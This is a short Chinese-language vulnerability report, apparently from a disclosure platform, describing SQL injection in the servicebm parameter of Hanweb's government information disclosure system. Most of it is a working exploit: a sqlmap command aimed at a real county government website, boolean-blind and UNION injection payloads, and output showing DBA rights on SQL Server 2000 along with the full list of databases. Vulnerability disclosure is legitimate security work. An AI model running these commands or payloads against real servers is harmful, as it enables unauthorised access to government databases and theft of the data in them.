大汉版通政府信息公开系统SQL注射2

### 简要描述： SQL ### 详细说明： 政府信息公开系统 某处sql注射漏洞 另一个文件里的参数 注入点 zfxxgk/serviceobjectinfo.jsp?servicebm= servicebm过滤不严存在注射 政府网站案例 sqlmap.py -u "http://xxgk.sihong.gov.cn/zfxxgk/serviceobjectinfo.jsp?s ervicebm=" --is-dba --dbs ``` --- Place: GET Parameter: servicebm Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: servicebm=%' AND 2512=2512 AND '%'=' Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: servicebm=-5118%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(104)+CHAR(106)+CHAR(111)+CHAR(113)+CH AR(68)+CHAR(74)+CHAR(85)+CHAR(104)+CHAR(103)+CHAR(84)+CHAR(77)+CHAR(118)+CHAR(10 0)+CHAR(75)+CHAR(113)+CHAR(118)+CHAR(99)+CHAR(111)+CHAR(113),NULL,NULL-- --- [11:57:12] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2000 current user is DBA: True ``` DBA权限 看下数据库 available databases [16]: [*] gov [*] jcms [*] jcmsvc [*] jis [*] lm [*] mailbook [*] master [*] model [*] msdb [*] newlm [*] Northwind [*] pubs [*] sms [*] tempdb [*] vipchat [*] xxgk ### 漏洞证明： [<img src="https://images.seebug.org/upload/201405/2022230917b784fd9ddc7b3eeab2e478a9423aaf.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2022230917b784fd9ddc7b3eeab2e478a9423aaf.jpg)